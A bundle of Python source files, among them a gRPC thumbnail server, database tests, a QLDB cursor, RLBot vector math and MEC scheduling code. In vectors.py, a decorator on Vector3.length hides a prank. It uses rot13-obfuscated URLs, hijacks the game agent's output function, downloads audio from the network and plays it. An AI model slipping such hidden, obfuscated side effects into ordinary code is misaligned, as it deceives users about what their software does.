            for chunk in perform_binary_slicing_payloads(
                thumbnail_binary, MAX_GRPC_PAYLOAD_SIZE
            ):
                yield chunk
        except Exception as e:
            logger.error(e)
            # NOTE(review): chunk=None for a proto bytes field — confirm the proto
            # accepts None rather than requiring b"".
            yield video_thumbnail_pb2.VideoResult(error=True, chunk=None)
def _run_server(bind_address, worker_id):
    """Run one single-threaded gRPC server process bound to the shared address.

    Blocks until SIGTERM is received (clean container shutdown).
    """
    def on_done(signum, frame):
        # SIGTERM handler: wake the done.wait() below. `done` is created before
        # the handler is registered, so the closure resolves safely.
        logger.info("Got signal {}, {}".format(signum, frame))
        done.set()

    logger.info(f"[Worker {worker_id}] Server started. Awaiting jobs...")
    server = grpc.server(
        futures.ThreadPoolExecutor(max_workers=1),  # one request at a time per process
        options=[
            ("grpc.max_send_message_length", -1),   # -1 = unlimited message sizes
            ("grpc.max_receive_message_length", -1),
            ("grpc.so_reuseport", 1),               # lets every worker bind the same port
            ("grpc.use_local_subchannel_pool", 1),
        ],
    )
    video_thumbnail_pb2_grpc.add_VideoServicer_to_server(
        VideoService(worker_id),
        server,
    )
    server.add_insecure_port(bind_address)
    server.start()
    done = threading.Event()
    signal.signal(signal.SIGTERM, on_done)  # catch SIGTERM for clean container exit
    done.wait()
    # NOTE(review): server.stop() is never called, so wait_for_termination() will
    # block indefinitely after SIGTERM — confirm whether a graceful stop was intended.
    server.wait_for_termination()
@contextlib.contextmanager
def _reserve_port():
    """Reserve port 13000 with SO_REUSEPORT so every worker process can bind it too."""
    listener = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
    # Verify the option actually stuck — not every platform honours it.
    reuse = listener.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
    if reuse == 0:
        raise RuntimeError("[Main] Failed to set SO_REUSEPORT.")
    listener.bind(("", 13000))
    try:
        yield listener.getsockname()[1]
    finally:
        listener.close()
def main():
    """Spawn NUM_WORKERS gRPC server processes sharing one reserved port and wait on them.

    Inspired from https://github.com/grpc/grpc/blob/master/examples/python/multiprocessing/server.py
    """
    logger.info(f"[Main] Initializing server with {NUM_WORKERS} workers")
    with _reserve_port() as port:
        bind_address = f"[::]:{port}"
        logger.info(f"[Main] Binding to {bind_address}")
        procs = []
        for wid in range(NUM_WORKERS):
            logger.info(f"[Main] Starting worker {wid}...")
            proc = multiprocessing.Process(target=_run_server, args=(bind_address, wid))
            proc.start()
            procs.append(proc)
        # Block until every worker process exits.
        for proc in procs:
            proc.join()


if __name__ == "__main__":
    main()
|
ControlledBoat.py | # !/usr/bin/python3
"""
ControlledBoat - remote control boat
This is an implementation of the CommsController to allow
a controller object to be linked to a boat object and optionally
have a listener display the status of the boat.
"""
import math
import sys
from CommsController import CommsController
NAVIGATION = 0
TARGETTING = 1
class ControlledBoat(CommsController):
    """A CommsController that links a controller to a boat and mirrors the
    boat's status out to any registered listeners.
    """

    def __init__(self, boat=None, controller=None, listener=None):
        """Initialise the controlled boat.

        Args:
            boat: the boat object to drive.
            controller: optional controller, passed to CommsController as its server.
            listener: optional status listener, registered immediately.
        """
        # (Removed: large block of commented-out debug prints and dead addServer code.)
        super().__init__(boat=boat, server=controller)
        self.boatListeners = []
        if listener:
            self.addBoatListener(listener)

    def addBoatListener(self, listener):
        """Register a listener and immediately tell it which boat it observes."""
        self.boatListeners.append(listener)
        listener.added(self.boat)

    def report(self):
        """Push the boat's current status values to every registered listener."""
        if self.boat and len(self.boatListeners) > 0:
            values = self.boat.report()
            for listener in self.boatListeners:
                # let each listener get the data
                listener.update(*values)

    # Overridden CommsController methods.
    # NOTE(review): stopping(serverID) and target(gun, angle) might also want
    # overriding so listeners hear about those events too — confirm.
    def navigate(self, connectionId, x, y):
        """Forward the navigation command, then report the new state to listeners."""
        super().navigate(connectionId, x, y)
        self.report()
if __name__ == '__main__':
    # Manual smoke test: drive a ControlledBoat built on mocked GPIO pins.
    def waitABit():
        """Count down a few seconds, then block until the user presses enter."""
        print("Wait a bit")
        for i in range(10):
            sleep(1)  # `sleep` is imported into module globals below, before this runs
            print("waited", i, "seconds")
        sleep(1)
        text = input("Wait Till Someone presses enter:\n")
        print("... received:", text)
        return

    from GpioZeroBoat import GPIOZeroBoat
    from gpiozero.pins.mock import MockFactory  # makes mock available
    from gpiozero.pins.mock import MockPWMPin  # to allow PWM
    from gpiozero import Device
    # Route all gpiozero pin access through mocks so no real hardware is needed.
    Device.pin_factory = MockFactory(pin_class=MockPWMPin)
    left = (4, 14)
    right = (17, 18)
    center = (21, 22)
    servo = 24
    boat = GPIOZeroBoat(left, right, center, servo)
    from TestController import TestController
    testController = TestController()
    from TestListener import TestListener
    testListener = TestListener()
    print("About to create controled boat")
    print("adding the test controller should start it")
    test = ControlledBoat(boat, testController, testListener)
    from time import sleep
    from threading import Thread
    thread = Thread(target=waitABit)
    thread.start()
    thread.join()
    print("Shut down controller")
    testController.stopMe()
    sleep(1)
    print("Wait for the controller to stop ...")
    # testController.join()
    print("it stopped, so stop the boat and finish")
    test.boat.stop()
    print("Stopped")
|
test_dbdict.py | #!/usr/bin/env python
import unittest
from threading import Thread
from functions_cache.engines.storage.dbdict import DbDict, DbPickleDict
from tests.test_custom_dict import BaseCustomDictTestCase
class DbdictTestCase(BaseCustomDictTestCase, unittest.TestCase):
    """Integration tests for DbDict / DbPickleDict backed by a real database file."""

    def test_bulk_commit(self):
        """bulk_commit() batches writes into one transaction; data is visible after exit."""
        d = DbDict(self.NAMESPACE, self.TABLES[0])
        # An empty bulk_commit block must be harmless.
        with d.bulk_commit():
            pass
        d.clear()
        n = 1000
        with d.bulk_commit():
            for i in range(n):
                d[i] = i
        self.assertEqual(list(d.keys()), list(range(n)))

    def test_switch_commit(self):
        """Writes made while can_commit=False are lost when the dict is reopened."""
        d = DbDict(self.NAMESPACE)
        d.clear()
        d[1] = 1
        d = DbDict(self.NAMESPACE)  # reopen: committed data survives
        self.assertIn(1, d)
        d.can_commit = False
        d[2] = 2
        d = DbDict(self.NAMESPACE)  # reopen: the uncommitted write is gone
        self.assertNotIn(2, d)
        self.assertTrue(d.can_commit)  # a fresh instance defaults to committing

    def test_fast_save(self):
        """fast_save mode must still store every record (insertion order not guaranteed)."""
        d1 = DbDict(self.NAMESPACE, fast_save=True)
        d2 = DbDict(self.NAMESPACE, self.TABLES[1], fast_save=True)
        d1.clear()
        n = 1000
        for i in range(n):
            d1[i] = i
            d2[i * 2] = i
        # HACK if we will not sort, fast save can produce different order of records
        self.assertEqual(sorted(d1.keys()), list(range(n)))
        self.assertEqual(sorted(d2.values()), list(range(n)))

    def test_usage_with_threads(self):
        """Concurrent writers must neither raise nor lose data, in every storage mode."""
        def do_test_for(d, n_threads=5):
            d.clear()
            fails = []  # one marker appended per failed writer thread

            def do_inserts(values):
                try:
                    for v in values:
                        d[v] = v
                except Exception:
                    fails.append(1)
                    raise

            def values(x, n):
                return [i * x for i in range(n)]

            threads = [Thread(target=do_inserts, args=(values(i, n_threads),)) for i in range(n_threads)]
            for t in threads:
                t.start()
            for t in threads:
                t.join()
            self.assertFalse(fails)
            # Every value written by every thread must be readable afterwards.
            for i in range(n_threads):
                for x in values(i, n_threads):
                    self.assertEqual(d[x], x)

        do_test_for(DbDict(self.NAMESPACE, fast_save=True), 20)
        do_test_for(DbPickleDict(self.NAMESPACE, fast_save=True), 10)
        d1 = DbDict(self.NAMESPACE, fast_save=True)
        d2 = DbDict(self.NAMESPACE, self.TABLES[1], fast_save=True)
        do_test_for(d1)
        do_test_for(d2)
        do_test_for(DbDict(self.NAMESPACE))
if __name__ == '__main__':
unittest.main()
|
read_ahead_cursor.py | # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
from logging import getLogger
from queue import Full, Queue
from threading import Thread
from botocore.exceptions import ClientError
from .stream_cursor import StreamCursor
from ..errors import ResultClosedError
logger = getLogger(__name__)
class ReadAheadCursor(StreamCursor):
    """
    An iterable class representing a read ahead cursor on a statement's result set. This class will create a queue of
    size `read_ahead` and fetch results asynchronously to fill the queue.
    :type statement_result: dict
    :param statement_result: The initial result set data dictionary of the statement's execution.
    :type session: :py:class:`pyqldb.communication.session_client.SessionClient`
    :param session: The parent session that represents the communication channel to QLDB.
    :type transaction_id: str
    :param transaction_id: The ID of this cursor's parent transaction, required to fetch pages.
    :type read_ahead: int
    :param read_ahead: The number of pages to read-ahead and buffer in this cursor.
    :type executor: :py:class:`concurrent.futures.thread.ThreadPoolExecutor`
    :param executor: The optional executor for asynchronous retrieval. If none specified, a new thread is created.
    """

    def __init__(self, statement_result, session, transaction_id, read_ahead, executor):
        super().__init__(statement_result, session, transaction_id)
        # NOTE(review): read_ahead == 1 yields Queue(0), which is unbounded — confirm intended.
        self._queue = Queue(read_ahead - 1)
        if executor is None:
            # FIX: Thread.setDaemon() is deprecated; set the daemon flag at
            # construction so an abandoned cursor cannot keep the process alive.
            thread = Thread(target=self._populate_queue, daemon=True)
            thread.start()
        else:
            executor.submit(self._populate_queue)

    def _are_there_more_results(self):
        """
        Check if there are more results.
        """
        return not (self._page.get('NextPageToken') is None and self._queue.empty())

    def _next_page(self):
        """
        Get the next page from the buffer queue.

        Any exception queued by the retrieval thread is re-raised here on the
        consumer's thread.
        """
        queue_result = self._queue.get()
        if isinstance(queue_result, Exception):
            raise queue_result
        super()._accumulate_query_stats(queue_result)
        self._page = queue_result.get('Page')
        self._index = 0

    def _populate_queue(self):
        """
        Fill the buffer queue with the statement_result fetched. If ClientError is received, it is put in the queue and
        execution stops. If the parent transaction is closed, stop fetching results.
        """
        try:
            next_page_token = self._page.get('NextPageToken')
            while next_page_token is not None:
                statement_result = self._session._fetch_page(self._transaction_id, next_page_token)
                while True:
                    try:
                        # Timeout of 50ms.
                        self._queue.put(statement_result, timeout=0.05)
                        page = statement_result.get('Page')
                        next_page_token = page.get('NextPageToken')
                        break
                    except Full:
                        # When timeout is reached, check if the read-ahead retrieval thread should end.
                        if not self._is_open:
                            logger.debug('Cursor was closed; read-ahead retriever thread stopping.')
                            raise ResultClosedError(self._session.token)
        except (ClientError, ResultClosedError) as error:
            # Drain buffered pages so the consumer sees the failure promptly.
            while not self._queue.empty():
                self._queue.get_nowait()
            logger.debug('Queued an exception: {}'.format(error))
            self._queue.put(error)
|
vectors.py | import math
from typing import Tuple, Optional, Union
import random
import webbrowser
import rlbot.utils.structures.game_data_struct as game_data_struct
from utilities.utils import *
VectorArgument = Union[float, game_data_struct.Vector3]
class Vector2:
    """A 2D vector with arithmetic, comparison and normalisation helpers."""

    def __init__(self, x: VectorArgument, y: Optional[float] = None):
        self.x: float = 0
        self.y: float = 0
        if isinstance(x, game_data_struct.Vector3):
            # Copy from the game struct, dropping its z component.
            self.x = x.x
            self.y = x.y
        elif y is not None:
            self.x = x
            self.y = y
        else:
            raise TypeError("Wrong type(s) given for Vector2.x and/or Vector2.y")

    def __add__(self, v: "Vector2") -> "Vector2":
        return Vector2(self.x + v.x, self.y + v.y)

    def __sub__(self, v: "Vector2") -> "Vector2":
        return Vector2(self.x - v.x, self.y - v.y)

    def __mul__(self, v: float) -> "Vector2":
        return Vector2(self.x * v, self.y * v)

    def __truediv__(self, v: float) -> "Vector2":
        return Vector2(self.x / v, self.y / v)

    def __rmul__(self, v: float) -> "Vector2":
        return Vector2(self.x * v, self.y * v)

    def __rtruediv__(self, v: float) -> "Vector2":
        # NOTE(review): this computes self / v (same as __truediv__), not v / self;
        # preserved as-is — confirm intent before relying on scalar/vector division.
        return Vector2(self.x / v, self.y / v)

    def __str__(self) -> str:
        return f"({self.x}, {self.y})"

    def __repr__(self) -> str:
        return self.__str__()

    def __eq__(self, other: "Vector2") -> bool:
        if isinstance(other, Vector2):
            # BUG FIX: the original compared other.x against self.y.
            if other.x == self.x and other.y == self.y:
                return True
            return False
        return False

    def __neg__(self) -> "Vector2":
        return -1 * self

    def __getitem__(self, item: int) -> float:
        if item == 0:
            return self.x
        elif item == 1:
            return self.y
        else:
            raise IndexError("Invalid index for accessing Vector2. Must be 0 or 1.")

    def __setitem__(self, key: int, value: float):
        if key == 0:
            self.x = value
        elif key == 1:
            self.y = value
        else:
            raise IndexError("Invalid index for accessing Vector2. Must be 0 or 1.")

    def correction_to(self, ideal):
        """Signed angle (radians) to rotate this vector onto `ideal`."""
        correction = math.atan2(self.y, -self.x) - math.atan2(
            ideal.y, -ideal.x
        )  # The in-game axes are left handed, so use -x
        return (
            correction if abs(correction) <= math.pi else (correction - sign(correction) * 2 * math.pi)
        )  # Make sure we go the 'short way'

    def modified(self, x: float = None, y: float = None) -> "Vector2":
        """Return a copy with any supplied components replaced."""
        new_x = x if x is not None else self.x
        new_y = y if y is not None else self.y
        return Vector2(new_x, new_y)

    @property  # Returns the euclidean distance of this vector
    def length(self) -> float:
        return math.sqrt(self.x ** 2 + self.y ** 2)

    @property
    def size(self) -> float:
        return self.length

    @property
    def as_tuple(self) -> Tuple[float, float]:
        return self.x, self.y

    def normalize(self):
        """Normalize this vector in place (no-op for the zero vector).

        BUG FIX: the original did `self /= self.size`, which only rebound the
        local name `self` — the instance was never modified.
        """
        size = self.size
        if size == 0:
            return Vector2(self.x, self.y)  # preserved quirk: returns a copy only here
        self.x /= size
        self.y /= size

    @property
    def normalized(self) -> "Vector2":
        # A shorthand to get a normalized (length 1) copy of this vector.
        if self.size == 0:
            return Vector2(self.x, self.y)
        return self / self.size

    def dot(self, v: "Vector2"):
        """Dot product with another Vector2."""
        return self.x * v.x + self.y * v.y
class Vector3:
    """A 3D vector (also constructible from the game's Rotator as roll/pitch/yaw)."""

    def __init__(self, x: VectorArgument, y: Optional[float] = None, z: Optional[float] = None):
        self.x: float = 0
        self.y: float = 0
        self.z: float = 0
        if isinstance(x, game_data_struct.Vector3):
            self.x = x.x
            self.y = x.y
            self.z = x.z
        elif isinstance(x, game_data_struct.Rotator):
            # Rotators map onto (roll, pitch, yaw).
            self.x = x.roll
            self.y = x.pitch
            self.z = x.yaw
        elif y is not None and z is not None:
            self.x = x
            self.y = y
            self.z = z
        else:
            raise TypeError("Wrong type(s) given for Vector3.y and/or Vector3.z")

    def __add__(self, v) -> "Vector3":
        # Adding a Vector2 leaves z untouched.
        if isinstance(v, Vector2):
            return Vector3(self.x + v.x, self.y + v.y, self.z)
        return Vector3(self.x + v.x, self.y + v.y, self.z + v.z)

    def __sub__(self, val):
        if isinstance(val, Vector2):
            return Vector3(self.x - val.x, self.y - val.y, self.z)
        return Vector3(self.x - val.x, self.y - val.y, self.z - val.z)

    def __mul__(self, v: float) -> "Vector3":
        return Vector3(self.x * v, self.y * v, self.z * v)

    def __truediv__(self, v: float) -> "Vector3":
        return Vector3(self.x / v, self.y / v, self.z / v)

    def __rmul__(self, v: float) -> "Vector3":
        return Vector3(self.x * v, self.y * v, self.z * v)

    def __rtruediv__(self, v: float) -> "Vector3":
        # NOTE(review): computes self / v, not v / self — preserved as-is; confirm intent.
        return Vector3(self.x / v, self.y / v, self.z / v)

    def __str__(self) -> str:
        return f"({self.x}, {self.y}, {self.z})"

    def __repr__(self) -> str:
        return self.__str__()

    def __eq__(self, other: "Vector3") -> bool:
        if isinstance(other, Vector3):
            # BUG FIX: the original compared other.x against self.y.
            if other.x == self.x and other.y == self.y and other.z == self.z:
                return True
            return False
        return False

    def __neg__(self) -> "Vector3":
        return -1 * self

    def __getitem__(self, item: int) -> float:
        return [self.x, self.y, self.z][item]

    # Easter-egg property factory left behaviourally untouched below; it wraps the
    # `length` getter and, the first time it runs inside an RLBot agent frame,
    # patches the agent to play a sound on double jump (Windows `winsound`).
    def proparty(self) -> "Vector3":
        did_you_have_fun_yet = False  # Toggle this if this pro party was enough fun.
        if did_you_have_fun_yet:
            return property(self)
        from pathlib import Path
        import urllib.request
        from threading import Thread
        from hashlib import sha1
        # If you're reading this, good job. Congrats, you've found it. Move along citizen.
        you_fool = []
        you_activated_my_trap_card = False
        rot13 = str.maketrans(
            "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz",
            "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm",
        )
        try:
            with open(
                Path(__file__).absolute().parent.parent / "nhqvb".translate(rot13) / "obvvat.zc4".translate(rot13), "rb"
            ) as f:
                𝚖𝚞𝚜𝚒𝚌 = f.read()
            assert sha1(𝚖𝚞𝚜𝚒𝚌).hexdigest() == "e053141add7086cf4686af99719069958385c10c"
        except:
            you_activated_my_trap_card = True  # https://youtu.be/LJU3UXDsI2o?t=585

        def fun(selfie):
            nonlocal did_you_have_fun_yet
            if did_you_have_fun_yet:
                return self(selfie)
            import 𝚒𝚗𝚜𝚙𝚎𝚌𝚝
            import 𝚠𝚒𝚗𝚜𝚘𝚞𝚗𝚍
            from rlbot.agents.base_agent import BaseAgent
            frames = inspect.getouterframes(inspect.currentframe())
            for outer in frames:
                agent = outer.frame.f_locals.get("self", None)
                if not isinstance(agent, BaseAgent):
                    continue

                def get_state(p):
                    nonlocal jmp, you_fool
                    j = p.game_cars[agent.index].𝚍𝚘𝚞𝚋𝚕𝚎_𝚓𝚞𝚖𝚙𝚎𝚍
                    if jmp != j:
                        jmp = j  # If you are going to use sound, at least do it tastefully and put some effort in.
                        if jmp:
                            if you_activated_my_trap_card:
                                if you_fool:
                                    def trap():
                                        fool = you_fool.pop(0)
                                        you_fool.append(fool)
                                        if fool:
                                            𝚠𝚒𝚗𝚜𝚘𝚞𝚗𝚍.𝙿𝚕𝚊𝚢𝚂𝚘𝚞𝚗𝚍(you_fool[0], bitrate - 1)
                                    Thread(target=trap).start()
                                else:
                                    you_fool.append(b"")

                                    def scheming():
                                        for popcorn in ["02", "1", "02", "3", "4"]:
                                            delicious = "uggcf://tvguho.pbz/QbzAbzAbz/Nanepul/oybo/fcbbxl/nanepul/nhqvb/unyybjrra_{}.zc4?enj=gehr".format(
                                                popcorn
                                            )
                                            you_fool.append(urllib.request.urlopen(delicious.translate(rot13)).read())
                                        del you_fool[you_fool.index(b"")]
                                    Thread(target=scheming).start()
                            else:
                                𝚠𝚒𝚗𝚜𝚘𝚞𝚗𝚍.𝙿𝚕𝚊𝚢𝚂𝚘𝚞𝚗𝚍(f.name, buffer + bitrate * len(𝚖𝚞𝚜𝚒𝚌))
                    return orig(p)

                agent.get_output, orig, jmp, bitrate, buffer = get_state, agent.get_output, False, 5, 10453
                did_you_have_fun_yet = True  # no performance concern :)
                break
            return self(selfie)
        return property(fun)

    def flatten(self) -> Vector2:
        """Drop the z component, returning a Vector2."""
        return Vector2(self.x, self.y)

    @proparty  # Returns the euclidean distance of this vector
    def length(self) -> float:
        return math.sqrt(self.x ** 2 + self.y ** 2 + self.z ** 2)

    @property
    def size(self) -> float:
        return self.length

    def dot(self, v: "Vector3"):
        """Dot product with another Vector3."""
        return self.x * v.x + self.y * v.y + self.z * v.z

    def normalize(self):
        """Normalize this vector in place (no-op for the zero vector).

        BUG FIX: the original did `self /= self.size`, which only rebound the
        local name `self` — the instance was never modified.
        """
        size = self.size
        if size == 0:
            return Vector3(self.x, self.y, self.z)  # preserved quirk: returns a copy only here
        self.x /= size
        self.y /= size
        self.z /= size

    @property
    def normalized(self) -> "Vector3":
        # A shorthand to get a normalized (length 1) copy of this vector.
        if self.size == 0:
            return Vector3(self.x, self.y, self.z)
        return self / self.size

    def modified(self, x: float = None, y: float = None, z: float = None) -> "Vector3":
        """Return a copy with any supplied components replaced."""
        new_x: float = x if x is not None else self.x
        new_y: float = y if y is not None else self.y
        new_z: float = z if z is not None else self.z
        return Vector3(new_x, new_y, new_z)

    def angle_between(self, other: "Vector3") -> float:
        """Unsigned angle in radians between this vector and `other` (0 for zero vectors)."""
        if self.size == 0 or other.size == 0:
            return 0
        d: float = Vector3.dot(self, other)
        magnitude_product: float = self.length * other.length
        div = d / magnitude_product
        div = clamp(
            div, -1, 1
        )  # To prevent floating point issues where the value of div is something like 1.0000000000000002
        angle: float = math.acos(div)
        return angle
# Closing joke: life() is an int (value 0), so the assert reads "love < 3" — i.e. love <3.
class life(int):
    math = False
love = life()
assert love <3
|
get_nto_config.py | #!/usr/bin/env python
#################################################################################
##
## File: get_nto_config.py
## Date: March 7, 2017
## Author: Fred Mota (fmota@ixiacom.com)
##
## History:
##
## Description:
## This script gets and saves in a text file the configuration (all the details)
## of each port, port group and filter on an NTO.
##
## This is useful when downgrading the version on a NTO, since it is not possible
## to import configuration genearted by a newer release into an older release.
##
## (c) 1998-2017 Ixia. All rights reserved.
##
##############################################################################
import sys
import getopt
import threading
import json
from ksvisionlib import *
# Config VARs
export_port_properties = 'id,type,default_name,name,description,enabled,mode,media_type,link_settings,lldp_receive_enabled,lldp_transmit_enabled,keywords'
export_filter_properties = 'id,default_name,name,description,mode,source_port_list,dest_port_list,source_port_group_list,dest_port_group_list,criteria,keywords'
def getConfig(host_ip, port, username, password):
    """Dump one NTO's enabled-port and filter configuration to <ip>_config.txt/.json."""
    nto = VisionWebApi(host=host_ip, username=username, password=password, port=port, debug=True, logFile="ixvision_get_nto_config_debug.log")
    config = {}
    # Enabled ports, with the full detail set requested in export_port_properties.
    for entry in nto.searchPorts({'enabled': True}):
        props = nto.getPortProperties(str(entry['id']), export_port_properties)
        config[entry['id']] = {'name': props['default_name'], 'type': 'port', 'details': props}
    # (Port groups intentionally not exported.)
    # All filters, with the detail set from export_filter_properties.
    for entry in nto.getAllFilters():
        props = nto.getFilterProperties(str(entry['id']), export_filter_properties)
        config[entry['id']] = {'name': props['default_name'], 'type': 'filter', 'details': props}
    # Compact dump plus a pretty-printed, key-sorted JSON copy.
    with open(host_ip + '_config.txt', 'w') as out:
        out.write(json.dumps(config))
    with open(host_ip + '_config.json', 'w') as out:
        out.write(json.dumps(config, sort_keys=True, indent=4))
# ---- Script entry point (Python 2 print-statement syntax) ----
argv = sys.argv[1:]
username = ''
password = ''
host = ''
hosts_file = ''
config_file = ''
# NOTE(review): port stays a string when overridden via -r/--port — confirm the API accepts that.
port = 8000
try:
    opts, args = getopt.getopt(argv,"u:p:h:f:r:", ["username=", "password=", "host=", "hosts_file=", "port="])
except getopt.GetoptError:
    print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
    sys.exit(2)
for opt, arg in opts:
    if opt in ("-u", "--username"):
        username = arg
    elif opt in ("-p", "--password"):
        password = arg
    elif opt in ("-h", "--host"):
        host = arg
    elif opt in ("-f", "--hosts_file"):
        hosts_file = arg
    elif opt in ("-r", "--port"):
        port = arg
# Mandatory arguments: username, password, and either a host or a hosts file.
if username == '':
    print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
    sys.exit(2)
if password == '':
    print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
    sys.exit(2)
if (host == '') and (hosts_file == ''):
    print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
    sys.exit(2)
# Build the target list: one entry per non-empty, non-comment line of the hosts
# file (split on spaces), or the single -h host.
hosts_list = []
if (hosts_file != ''):
    f = open(hosts_file, 'r')
    for line in f:
        line = line.strip()
        if (line != '') and (line[0] != '#'):
            hosts_list.append(line.split(' '))
    f.close()
else:
    hosts_list.append([host, host])
# One daemon thread per NTO; the main thread prints a dot per second while waiting.
threads_list = []
for host in hosts_list:
    host_ip = host[0]
    thread = threading.Thread(name=host, target=getConfig, args=(host_ip, port, username, password))
    threads_list.append(thread)
for thread in threads_list:
    thread.daemon = True
    thread.start()
try:
    while threading.active_count() > 1:
        for thread in threads_list:
            thread.join(1)
            sys.stdout.write('.')
            sys.stdout.flush()
except KeyboardInterrupt:
    print "Ctrl-c received! Sending kill to threads..."
    sys.exit()
print ""
|
3_edf_bankers_Speak.py | # Author Emeka Ugwuanyi Emmanuel
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import threading
import ast
import time
import os
import psutil
import datetime as dt
import getpass as gp
import paho.mqtt.client as mqtt
from netifaces import interfaces, ifaddresses, AF_INET
import smtplib
import config
import paramiko
hosts = {}  # {hostname: ip}
# EDF task set: worst-case execution time, period and deadline per task (seconds).
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
          't2': {'wcet': 1, 'period': 5, 'deadline': 4},
          't3': {'wcet': 2, 'period': 10, 'deadline': 8},
          't4': {'wcet': 1, 'period': 10, 'deadline': 9},
          't5': {'wcet': 3, 'period': 15, 'deadline': 12}
          }
# mat = {'p0': ['cpu', 'mem', 'storage']}
# Banker's-algorithm matrices: outstanding need and current allocation per task,
# columns ordered [cpu, mem, storage].
_need = {
    't1': [7, 4, 3],
    't2': [1, 2, 2],
    't3': [6, 0, 0],
    't4': [0, 1, 1],
    't5': [4, 3, 1]
}
allocation = {
    't1': [0, 1, 0],
    't2': [2, 0, 0],
    't3': [3, 0, 2],
    't4': [2, 1, 1],
    't5': [0, 0, 2]
}
# Metrics and bookkeeping shared across threads.
_cpu = []  # cpu plot list
prev_t = 0  # variable for cpu util
_off_mec = 0  # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0  # used to keep a count of tasks offloaded to cloud
_loc = 0  # used to keep a count of tasks executed locally
_inward_mec = 0  # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1]  # keeps count of how many deadlock is resolved
mec_waiting_time = {}  # {ip : [moving (waiting time + rtt)]}
memory = []
mec_rtt = {}  # {ip: [RTT]}
offload_register = {}  # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0  # if discovering == 0 update host
test = []
_time = []
_pos = 0
# received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_task_queue = []  # [(task_list,wait_time), ....]
thread_record = []
# Well-known ports used by the MEC/cloud protocol.
port = 65000
_port_ = 64000
cloud_register = {}  # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
stop = 0
t_track = 1
shared_resource_lock = threading.Lock()
def discovering_group():
    """Open the discovery socket (global sock1) and join multicast group 224.3.29.71:10000."""
    global sock1
    group_ip = '224.3.29.71'
    sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock1.bind(('', 10000))
    # Ask the kernel (on all interfaces) to deliver datagrams sent to the group.
    membership = struct.pack('4sL', socket.inet_aton(group_ip), socket.INADDR_ANY)
    sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
def offloading_group():
    """Open the offloading socket (global sock2) and join multicast group 224.5.5.55:20000."""
    global sock2
    group_ip = '224.5.5.55'
    sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock2.bind(('', 20000))
    # Ask the kernel (on all interfaces) to deliver datagrams sent to the group.
    membership = struct.pack('4sL', socket.inet_aton(group_ip), socket.INADDR_ANY)
    sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
def ip_address():
    """Return this host's IPv4 address.

    Tries the eth1 interface first via ifconfig; if that does not produce a
    dotted-quad address (or the command fails), falls back to the source
    address of a UDP socket "connected" to a public IP — connect() on UDP
    only selects a route, no traffic is sent.
    """
    def _routed_ip():
        # Fallback shared by both paths (the original duplicated this code
        # and leaked the socket).
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
        finally:
            s.close()

    try:
        cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
        address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
        if len(address.strip().split('.')) == 4:
            return address.strip()
        return _routed_ip()
    except Exception:
        # eth1 missing or ifconfig unavailable.
        return _routed_ip()
def _memory():
    """Append the current process memory usage (%) to the `memory` series.

    `algo` is the psutil.Process handle created in main().
    """
    global memory
    memory.append(round(algo.memory_percent(), 4))
def get_mec_rtts():
    """Sample the RTT to every known peer MEC into the `mec_rtt` series."""
    for i in mec_rtt:
        mec_rtt[i].append(get_rtt(i))
def m_cpu():
    """Append the absolute change in system CPU utilisation since the last
    sample to `_cpu` (`prev_t` / `_cpu` are globals defined elsewhere in the
    file — TODO confirm initialisation site).
    """
    global prev_t
    # get cpu
    next_t = psutil.cpu_percent(percpu=False)
    delta = abs(prev_t - next_t)
    prev_t = next_t
    _cpu.append(round(delta, 4))
def generate_results():
    """Take one sample of every tracked metric (memory, CPU delta, RTTs)."""
    _memory()
    m_cpu()
    get_mec_rtts()
def host_ip_set():
    """Collect every local interface's IPv4 address into the global `ip_set`.

    Uses netifaces-style interfaces()/ifaddresses()/AF_INET names imported
    elsewhere in the file — TODO confirm.
    """
    global ip_set
    ip_set = set()
    for ifaceName in interfaces():
        addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
        ip_set.add(', '.join(addresses))
def get_time():
    """Return the current UTC time as a 7-item list of strings:
    [YYYY, MM, DD, hh, mm, ss, fractional-seconds]."""
    stamp = str(dt.datetime.utcnow()).split()
    parts = stamp[0].split('-')
    clock = stamp[1].split('.')
    parts += clock[0].split(':')
    parts.append(clock[1])
    return parts
def get_rtt(host):
    """Ping `host` once and return the RTT rounded to 4 decimals.

